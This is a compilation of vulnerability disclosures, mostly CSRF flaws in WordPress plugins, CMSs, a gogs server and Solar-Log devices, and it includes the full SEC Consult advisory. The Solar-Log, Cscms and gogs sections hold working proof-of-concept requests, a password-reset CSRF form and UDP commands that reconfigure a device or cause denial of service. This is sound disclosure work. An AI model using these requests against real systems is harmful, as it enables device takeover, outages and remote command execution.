The Genki Pre-Publish Reminder WordPress plugin through 1.4.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored XSS as well as RCE when custom code is added via the plugin settings.

CVE-2022-1758

Cross-site scripting vulnerability exists in WP Statistics versions prior to 13.2.0 because it improperly processes a platform parameter. By exploiting this vulnerability, an arbitrary script may be executed on the web browser of the user who is logging in to the website using the product.

CVE-2022-27231: WP Statistics

Cross-site request forgery (CSRF) vulnerability in Easy Blog for EC-CUBE4 Ver.1.0.1 and earlier allows a remote unauthenticated attacker to hijack the authentication of the administrator and delete a blog article or a category via a specially crafted page.

Published:2022/05/13  Last Updated:2022/05/13

**Overview**

EC-CUBE plugin "Easy Blog for EC-CUBE4" provided by COREMOBILE Co. Ltd. contains a cross-site request forgery vulnerability.

**Products Affected**

*   EC-CUBE plugin "Easy Blog for EC-CUBE4" Ver.1.0.1 and earlier

**Description**

EC-CUBE plugin "Easy Blog for EC-CUBE4" provided by COREMOBILE Co. Ltd. contains a cross-site request forgery vulnerability (CWE-352).

**Impact**

If a site administrator who is logging in to the management screen of EC-CUBE on which the plug-in is installed accesses a specially crafted page, a blog article or a category may be deleted.

**Solution**

**Update the software**  
Update the software to the latest version according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:H/Au:N/C:N/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Furukawa Natsumi of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2022-27174: EC-CUBE plugin "Easy Blog for EC-CUBE4" vulnerable to cross-site request forgery

A Cross Site Request Forgery (CSRF) vulnerability exists in TheDayLightStudio Fuel CMS 1.5.0 via a POST call to /fuel/sitevariables/delete/4.

The content management system for premium-grade websites

**Dashboard**

View important information at a glance such as your site traffic, email campaign statistics, or your latest tweets.

Learn more

**Search**

Filter through large lists with a quick search or even incorporate your own advanced search filtering.

Learn more

**Restore From Archive**

Make a mistake and want to restore a previous version? No problem. FUEL archives previous versions by default which makes restoring old data easy.

**Fast Navigation**

Quickly navigate to other pages from within the editing view.

**Upload View Files**

Build your site statically with view files, then upload them to the CMS for your client's to edit when you are ready.

**Replace**

Immediately replace the contents of a page with another page's content. Great for moving draft pages to published pages.

**Multi-Language Support**

Create SEO friendly page content in any language you want... including Klingon.

Learn more

**Layout Fields**

Choose from the wide assortment of customizable, built-in form fields, or create your own.

Learn more

**Blocks**

Store repeatable parts of your site, such as headers and footers, as blocks and manage them as either static files or in the CMS.

Learn more

**Navigation Files**

Store your navigation structure in a static file for easier development and then upload to the CMS to manage when ready.

Learn more

**Site Variables**

Setup global page variables, like copyright dates and email addresses, and access them on any page.

Learn more

**Login As**

Administrators can login as another user and immediately diagnose user permission issues.

Learn more

**Permissions**

Assign specific create, edit, delete, and publish user permissions for your modules.

Learn more

**Change Layouts**

Quickly change a pages layout while viewing the page.

**Module Tools**

Run module tools in the context of the page such as an SEO page analysis, HTML validate, and link checking.

Learn more

**CMS or Framework? Yes.**

**For Both Kinds of People**

Content editors love FUEL CMS for its good looks and charm. Developers love it for being open and thoughtful.

**Open Source**

Fork, merge, push and pull until your heart's content. FUEL CMS is hosted on GitHub and is totally free to download and use.

**You're in Great Company**

Every day, more and more companies are discovering the power of FUEL CMS.

**Alta Bicycle Share**

Bike sharing is an innovative approach to urban mobility, combining the convenience and flexibility of a private vehicle with the accessibility and reliability of public mass transit, making bike share perfectly suited for urban communities.

View Website

**Social Angels**

Social Angels is an online giving community, supporting causes that create fresh possibilities for the well being of people, organizations and communities in New Zealand.

View Website

**Impression Real Estate**

Impression Real Estate Ltd is a Licensed Real Estate Agent (REAA 2008) responsible for property management of more than 1750 properties throughout Auckland.

View Website

**Want to Learn More? Awesome.**

**Be the first to get cool updates, hot tips and sneak peeks.**

We'll only use your email address to notify you of updates to FUEL CMS and for the delightfully infrequent newsletter.

CVE-2021-44117: FUEL CMS - A CodeIgniter Content Management System

A vulnerability classified as problematic was found in Solare Solar-Log 2.8.4-56/3.5.2-85. Affected by this vulnerability is an unknown functionality of the component Config Handler. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices**

_From_: SEC Consult Vulnerability Lab <research () sec-consult com>  
_Date_: Wed, 22 Mar 2017 10:21:27 +0100  

SEC Consult Vulnerability Lab Security Advisory < 20170322-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Solare Datensysteme GmbH
                     Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
 vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
      fixed version: Firmware 3.5.3-86
         CVE number: -
             impact: Critical
           homepage: http://www.solar-log.com/de/home.html
              found: 2017-01-23
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in the development and sale of monitoring systems
for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and
Jörg Karwath and was created from the company "TOP Solare Datensysteme". This
company had been developing and selling the "SolarLog™" product range since
2005. Our core competence covers innovative products with short development
cycles and an excellent cost/performance ratio. Our developments have the
outstanding characteristics of high customer value, simple operation and
universal application without requiring time-consuming installation of
software."

Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html

Business recommendation:
------------------------
SEC Consult recommends to immediately install the available firmware update
and restrict network access.

Furthermore, this device should not be used in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Download of Configuration including Device-Password
This vulnerability is present at least on firmware 2.8.4-56.

An attacker can download the configuration file without authentication and
extract the password to login to Solar-Log. Therefore, an attacker can gain
administrative access to such a device without prior authentication.


2) Cross-Site Request Forgery (CSRF)
This vulnerability is present at least on firmware 3.5.2-85.

A CSRF vulnerability enables an attacker to remove/modify a password of a
device by luring an authenticated user to click on a crafted link. An attacker
is able to take over the device by exploiting this vulnerability.


3) Unauthenticated Arbitrary File Upload
This vulnerability is present at least on firmware 3.5.2-85.

Any files can be uploaded on the Solar-Log by using a crafted POST request. An
attacker can start a malicious website or use the Solar-Log as share to store
any (illegal) contents.


4) Information Disclosure (CVE-2001-1341)
All Solar-Log devices in the current firmware versions are prone to this
information disclosure vulnerability. (2.8.4-56 / 3.5.2-85)

The network configuration of the internal network including the gateway and
the MAC address of the device are leaked.

All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS
version and serial number are leaked as well.


5) Unauthenticated Change of Network-Configuration
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

Since the Solar-Log is based on the chips of Beck IPC a UDP configuration
server is enabled by default. This server allows to change the IP configuration
over a specific UDP port. This functionality can be protected with a password,
but this is not set in the affected firmware versions.

The MAC address, which is leaked by 4), is needed to configure the device.
An attacker can reconfigure the device without any authentication.


6) Unauthenticated Denial of Service
All Solar-Log devices in the current firmware versions are prone to this
vulnerability. (2.8.4-56 / 3.5.2-85)

The Beck IPC UDP configuration server on Solar-Log device can be attacked with
arbitrary UDP packets to permanently disable the Solar-Log until a manual
reboot is triggered.


7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
Potentially available in all Solar-Log devices in the current firmware
versions. (2.8.4-56 / 3.5.2-85)

Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip
over the network via UDP, a missing password can also enable an attacker to do
this on a Solar-Log device. This action can lead to a simple Denial of Service
or a complex botnet of Solar-Log devices!


Proof of concept:
-----------------
1) Unauthenticated Download of Configuration including Device-Password
The full configuration is exposed by sending the following GET-request:
-------------------------------------------------------------------------------
GET /data/misc.dat HTTP/1.1
Host: <IP-Address>
\[...\]
-------------------------------------------------------------------------------
Since the response contains the password, an attacker can easily take
control over the device.


2) Cross-Site Request Forgery
By luring the user to issue the following request, the password is removed:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=none;postval=105;{"221":"0","223":"0","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------

By luring the user to issue the following request, the password is modified:
-------------------------------------------------------------------------------
POST /setjp HTTP/1.1
Host: <IP-Address>

preval=none;postval=105;{"221":"0","223":"1","224":"<New-Password>","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"}
-------------------------------------------------------------------------------


3) Unauthenticated Arbitrary File Upload
Any files can be uploaded by using the following POST-request:
-------------------------------------------------------------------------------
POST /menu/d\_debug\_db.html HTTP/1.1
Host: <IP-Address>
\[...\]
Referer: http://<IP-Address>/menu/d\_debug\_db.html
Content-Type: multipart/form-data; boundary=--------301473270
Content-Length: 341

----------301473270
Content-Disposition: form-data; name="DESTINATION-PATH"

PoC.html
----------301473270
Content-Disposition: form-data; name="FILE-CONTENT"; filename="file.txt"
Content-Type: text/plain

<html>
 <head>
 <title>SEC-Test</title>
 </head>
 <body>
 <script>alert("XSS-PoC");</script>
 </body>
</html>
----------301473270
Content-Disposition: form-data; name="L\_UPLOAD"

Hochladen
----------301473270--
-------------------------------------------------------------------------------

The uploaded content can be reached by this link:
http://<IP-Address>/PoC.html


4) Information Disclosure (CVE-2001-1341)
This vulnerability is a known issue to IPC@CHIP since 2001.
See: http://www.securityfocus.com/bid/2767/info

The following URL can be used to open the "ChipCfg" file on a Solar-Log device:
http://<IP-Address>/ChipCfg

If an attacker is in the same subnet, he can directly request this information
from the device (the device responds to multicast) with the following command:
$ echo -n "0 1 A" >/dev/udp/<Target-IP>/8001


5) Unauthenticated Change of Network-Configuration
By using the following command a change of the network configuration can be
triggerd unauthenticated on UDP port 8001:
$ echo -n "<MAC> 4 2 0 <Desired-IP-Address> <Desired-Netmask> <Desired-Gateway>"

> /dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254"

> /dev/udp/192.168.4.9/8001

6) Unauthenticated Denial of Service
By using arbitrary null characters the IPC@CHIP can be pushed into an
undesired state:
$ echo -n "<MAC> 0 <IP-Address> <Netmask> <Gateway> DDDD\\0\\0"

> /dev/udp/<Target-IP>/8001

Example:
$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD\\0\\0"

> /dev/udp/192.168.4.5/8001

7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory
This action was not tested against the device. Such attack can brick the
Solar-Log. The worst case scenario would be a botnet exploiting this vulnerability.

A network-dump of the "CHIPTOOL" would be enough to reconstruct the required
UDP packets for the attack.


Vulnerable / tested versions:
-----------------------------
Solar-Log 1200 - 3.5.2-85
Solar-Log 800e - 2.8.4-56

Since the firmware for the other Solar-Log devices is exactly the same,
other devices with the same versions are also prone to the vulnerabilities!


Vendor contact timeline:
------------------------
2017-02-02: Contacting vendor via info () solar-log com, support () solar-log com
            and berlin () solar-log com.
2017-02-14: Vendor responds and requests the advisory unencrypted; Sent the
            advisory unencrypted to the vendor.
2017-02-20: Asked for an update.
2017-02-21: Vendor states that the patch is in development. The update will
            be published before 2017-03-24.
2017-03-14: Asked for a status update. Vendor states that the update will
            be available on 2017-03-21.
2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 build
            86 for all affected Solar-Log devices.
            Informing the vendor that the release of the advisory is set to
            2017-03-22.
2017-03-22: Public advisory release.


Solution:
---------
Upgrade to firmware 3.5.3-86
http://www.solar-log.com/de/service-support/downloads/firmware.html

Workaround:
-----------
Restrict network access to the devices.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec\_consult

EOF T. Weber / @2017

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SEC Consult SA-20170322-0 :: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices** _SEC Consult Vulnerability Lab (Mar 22)_

CVE-2017-20019: Multiple vulnerabilities in Solare Datensysteme Solar-Log devices

A Cross-site request forgery (CSRF) vulnerability in Cscms music portal system v4.2 allows remote attackers to change the administrator's username and password.

Cross-site request forgery (CSRF) vulnerability in /Cscms\_4.2/upload/admin.php/sys/save allow remote attackers to change  
administrator's username and password.  
Trigger condition: the administrator clicks a malicious link

<html\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <form action\="http://192.168.136.136/Cscms\_4.2/upload/admin.php/sys/save" method\="POST"\>
      <input type\="hidden" name\="adminname" value\="admin" />
      <input type\="hidden" name\="adminpass" value\="123" />#The password you want to change here is 123
      <input type\="hidden" name\="sid" value\="1" />
      <input type\="hidden" name\="id" value\="1" />
      <input type\="submit" value\="Submit request" />
    </form\>
  </body\>
</html\>

CVE-2022-30898: Cross-site request forgery vulnerability exists in Cscms music portal system v4.2 · Issue #37 · chshcms/cscms

OS Command Injection in GitHub repository gogs/gogs prior to 0.12.9.

**Description**

Deploy and run gogs.

**Proof of Concept**

1.  Create a repository and upload a file named config to the repository repo6. The content of the file is as follows:

    [core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        ignorecase = true
        precomposeunicode = true
        sshCommand = notepad
    [remote "origin"]
        url = git@github.com:torvalds/linux.git
        fetch = +refs/heads/*:refs/remotes/origin/*
    [branch "master"]
        remote = origin
        merge = refs/heads/master
    

2.The attacker can remove the .git/config file.

http request:

    POST /admin1/repo6/_delete/master/.git/config HTTP/1.1
    Host: 192.168.1.59:3000
    Content-Length: 130
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
    Connection: close
    
    _csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
    
    

3.  The attacker can set **tree\_path** tree_path=.git/config to move a file into the .git/config directory.

http request:

    POST /admin1/repo6/_edit/master/aaa/config HTTP/1.1
    Host: 192.168.1.59:3000
    Content-Length: 722
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
    Connection: close
    
    _csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=.git%2Fconfig&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
    

Note: Write or rewrite the .git/config file ( the core.sshCommand was already set), which leads to remote command execution vulnerability.

Then the command notepad executed on the server.

**Impact**

1.This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.

2.Delete arbitrary files, such as gogs/custom/conf/app.ini

3.Write the file to another path.

**Occurrences**

CVE-2022-1986: OS Command Injection in file editor in gogs

The LiveSync for WordPress plugin through 1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2022-1712

The Throws SPAM Away WordPress plugin before 3.3.1 does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged in admin delete comments via a CSRF attack

CVE-2022-1709

The WP Simple Adsense Insertion WordPress plugin before 2.1 does not perform CSRF checks on updates to its admin page, allowing an attacker to trick a logged in user to manipulate ads and inject arbitrary javascript via submitting a form.

Tag

#csrf